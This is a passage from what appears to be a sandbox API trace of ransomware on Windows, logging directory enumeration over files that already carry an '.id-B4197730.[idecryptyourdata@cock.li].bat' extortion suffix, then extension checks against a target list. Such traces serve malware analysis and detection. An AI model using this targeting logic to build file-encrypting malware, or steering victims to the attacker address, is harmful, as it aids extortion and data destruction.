nFileSizeLow=0x2884, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="stop.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="STOPIC~1.BAT")) returned 1 [0156.252] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe06cda5, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe06cda5, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe06cda5, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x56e, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SysReqMet.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SYSREQ~2.BAT")) returned 1 [0156.252] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdfd443d, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdfd443d, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe911666, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x574, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SysReqNotMet.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SYSREQ~1.BAT")) returned 1 [0156.252] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe046b78, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe046b78, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe0b9361, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x2884, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="warn.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WARNIC~1.BAT")) returned 1 [0156.252] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe046b78, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe046b78, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe0b9361, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x2884, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="warn.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WARNIC~1.BAT")) returned 0 [0156.252] FindClose (in: hFindFile=0x728308 | out: hFindFile=0x728308) returned 1 [0156.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.253] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe020920, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe020920, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfed69f3e, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xf18, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="header.bmp.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="HEADER~1.BAT")) returned 1 [0156.253] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x3b18abd, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0xadd3953, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="netfx_Core.mzz.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="NETFX_~1.BAT")) returned 1 [0156.254] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x2f7922a, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x290310, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="netfx_Core_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="NETFX_~2.BAT")) returned 1 [0156.254] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe0df4ba, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe0df4ba, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xff0b1533, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x11c108, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="netfx_Core_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="NETFX_~3.BAT")) returned 1 [0156.255] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x7d6e19f, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x29e23d7, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="netfx_Extended.mzz.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="NETFX_~4.BAT")) returned 1 [0156.255] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2570d26, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x2570d26, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x2655bca, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0xd5110, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="netfx_Extended_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="NE9213~1.BAT")) returned 1 [0156.255] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2ad9a55, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x2ad9a55, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x2af20fc, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x79110, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="netfx_Extended_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="NEE644~1.BAT")) returned 1 [0156.255] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe020920, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe020920, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe151ad2, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x427a6, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="ParameterInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PARAME~1.BAT")) returned 1 [0156.255] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2daf62d, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x2daf62d, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x2daf62d, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x2d304, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="RGB9RAST_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="RGB9RA~1.BAT")) returned 1 [0156.256] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dd5868, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x2dd5868, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x305e031, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x17304, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="RGB9Rast_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="RGB9RA~2.BAT")) returned 1 [0156.256] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2f7922a, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x2f7922a, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x2f7922a, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x13236, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="Setup.exe.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPE~1.BAT")) returned 1 [0156.256] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2f9f4c4, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x2f9f4c4, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x2fc56bf, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0xc5252, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="SetupEngine.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPE~2.BAT")) returned 1 [0156.256] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x30842a8, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x30842a8, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x3168ff0, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x4824a, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="SetupUi.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPU~2.BAT")) returned 1 [0156.256] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe020920, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe020920, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe09300d, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x769a, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="SetupUi.xsd.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPU~1.BAT")) returned 1 [0156.256] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x31900f4, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x31900f4, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x36a0235, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x17854, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="SetupUtility.exe.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPU~3.BAT")) returned 1 [0156.257] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe020920, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe020920, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe8f05bb, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xa174, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="SplashScreen.bmp.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SPLASH~1.BAT")) returned 1 [0156.257] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x35e17c0, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x35e17c0, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x35e17c0, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x23518, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="sqmapi.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SQMAPI~1.BAT")) returned 1 [0156.257] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe0b9361, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe0b9361, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe9377b6, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x37fa, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="Strings.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="STRING~1.BAT")) returned 1 [0156.257] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe177ed2, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe177ed2, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfece51f1, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x98e8, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="UIINFO~1.BAT")) returned 1 [0156.257] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe911666, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe911666, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0x1559793, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x1977e, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="watermark.bmp.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WATERM~1.BAT")) returned 1 [0156.257] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x4c1b695, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x5b5241, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WINDOW~1.BAT")) returned 1 [0156.257] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x4480692, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x2d764e, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WINDOW~2.BAT")) returned 1 [0156.258] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x57e0ef0, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x59b2fc, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WINDOW~3.BAT")) returned 1 [0156.258] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0x55a4d68, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x2cae27, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WINDOW~4.BAT")) returned 1 [0156.258] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0x55a4d68, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x2cae27, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WINDOW~4.BAT")) returned 0 [0156.258] FindClose (in: hFindFile=0x6ba130 | out: hFindFile=0x6ba130) returned 1 [0156.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3db0950 | out: hHeap=0x6a0000) returned 1 [0156.258] FindNextFileW (in: hFindFile=0x6ba870, lpFindFileData=0x34ffcf8 | out: lpFindFileData=0x34ffcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0156.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x3db0950 [0156.258] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName=".", cAlternateFileName="")) returned 0x728108 [0156.259] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="..", cAlternateFileName="")) returned 1 [0156.336] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xac3efa99, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0xac3efa99, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="BCD", cAlternateFileName="")) returned 1 [0156.362] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0156.362] lstrlenW (lpString="BCD.LOG") returned 7 [0156.362] lstrlenW (lpString=".1cd") returned 4 [0156.362] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0156.362] lstrlenW (lpString=".3ds") returned 4 [0156.405] lstrcmpiW (lpString1=".3ds", lpString2=".LOG") returned -1 [0156.405] lstrlenW (lpString=".3fr") returned 4 [0156.405] lstrcmpiW (lpString1=".3fr", lpString2=".LOG") returned -1 [0156.405] lstrlenW (lpString=".3g2") returned 4 [0156.405] lstrcmpiW (lpString1=".3g2", lpString2=".LOG") returned -1 [0156.405] lstrlenW (lpString=".3gp") returned 4 [0156.405] lstrcmpiW (lpString1=".3gp", lpString2=".LOG") returned -1 [0156.405] lstrlenW (lpString=".7z") returned 3 [0156.405] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0156.405] lstrlenW (lpString=".accda") returned 6 [0156.405] lstrcmpiW (lpString1=".accda", lpString2="CD.LOG") returned -1 [0156.405] lstrlenW (lpString=".accdb") returned 6 [0156.405] lstrcmpiW (lpString1=".accdb", lpString2="CD.LOG") returned -1 [0156.406] lstrlenW (lpString=".accdc") returned 6 [0156.406] lstrcmpiW (lpString1=".accdc", lpString2="CD.LOG") returned -1 [0156.406] lstrlenW (lpString=".accde") returned 6 [0156.406] lstrcmpiW (lpString1=".accde", lpString2="CD.LOG") returned -1 [0156.406] lstrlenW (lpString=".accdt") returned 6 [0156.406] lstrcmpiW (lpString1=".accdt", lpString2="CD.LOG") returned -1 [0156.406] lstrlenW (lpString=".accdw") returned 6 [0156.406] lstrcmpiW (lpString1=".accdw", lpString2="CD.LOG") returned -1 [0156.406] lstrlenW (lpString=".adb") returned 4 [0156.406] lstrcmpiW (lpString1=".adb", lpString2=".LOG") returned -1 [0156.406] lstrlenW (lpString=".adp") returned 4 [0156.406] lstrcmpiW (lpString1=".adp", lpString2=".LOG") returned -1 [0156.406] lstrlenW (lpString=".ai") returned 3 [0156.406] lstrcmpiW (lpString1=".ai", lpString2="LOG") returned -1 [0156.406] lstrlenW (lpString=".ai3") returned 4 [0156.406] lstrcmpiW (lpString1=".ai3", lpString2=".LOG") returned -1 [0156.406] lstrlenW (lpString=".ai4") returned 4 [0156.406] lstrcmpiW (lpString1=".ai4", lpString2=".LOG") returned -1 [0156.407] lstrlenW (lpString=".ai5") returned 4 [0156.407] lstrcmpiW (lpString1=".ai5", lpString2=".LOG") returned -1 [0156.407] lstrlenW (lpString=".ai6") returned 4 [0156.407] lstrcmpiW (lpString1=".ai6", lpString2=".LOG") returned -1 [0156.407] lstrlenW (lpString=".ai7") returned 4 [0156.407] lstrcmpiW (lpString1=".ai7", lpString2=".LOG") returned -1 [0156.407] lstrlenW (lpString=".ai8") returned 4 [0156.407] lstrcmpiW (lpString1=".ai8", lpString2=".LOG") returned -1 [0156.407] lstrlenW (lpString=".anim") returned 5 [0156.407] lstrcmpiW (lpString1=".anim", lpString2="D.LOG") returned -1 [0156.407] lstrlenW (lpString=".arw") returned 4 [0156.407] lstrcmpiW (lpString1=".arw", lpString2=".LOG") returned -1 [0156.407] lstrlenW (lpString=".as") returned 3 [0156.407] lstrcmpiW (lpString1=".as", lpString2="LOG") returned -1 [0156.407] lstrlenW (lpString=".asa") returned 4 [0156.407] lstrcmpiW (lpString1=".asa", lpString2=".LOG") returned -1 [0156.407] lstrlenW (lpString=".asc") returned 4 [0156.407] lstrcmpiW (lpString1=".asc", lpString2=".LOG") returned -1 [0156.407] lstrlenW (lpString=".ascx") returned 5 [0156.408] lstrcmpiW (lpString1=".ascx", lpString2="D.LOG") returned -1 [0156.408] lstrlenW (lpString=".asm") returned 4 [0156.408] lstrcmpiW (lpString1=".asm", lpString2=".LOG") returned -1 [0156.408] lstrlenW (lpString=".asmx") returned 5 [0156.408] lstrcmpiW (lpString1=".asmx", lpString2="D.LOG") returned -1 [0156.408] lstrlenW (lpString=".asp") returned 4 [0156.408] lstrcmpiW (lpString1=".asp", lpString2=".LOG") returned -1 [0156.408] lstrlenW (lpString=".aspx") returned 5 [0156.408] lstrcmpiW (lpString1=".aspx", lpString2="D.LOG") returned -1 [0156.408] lstrlenW (lpString=".asr") returned 4 [0156.408] lstrcmpiW (lpString1=".asr", lpString2=".LOG") returned -1 [0156.408] lstrlenW (lpString=".asx") returned 4 [0156.408] lstrcmpiW (lpString1=".asx", lpString2=".LOG") returned -1 [0156.408] lstrlenW (lpString=".avi") returned 4 [0156.408] lstrcmpiW (lpString1=".avi", lpString2=".LOG") returned -1 [0156.408] lstrlenW (lpString=".avs") returned 4 [0156.408] lstrcmpiW (lpString1=".avs", lpString2=".LOG") returned -1 [0156.409] lstrlenW (lpString=".backup") returned 7 [0156.409] lstrcmpiW (lpString1=".backup", lpString2="BCD.LOG") returned -1 [0156.409] lstrlenW (lpString=".bak") returned 4 [0156.409] lstrcmpiW 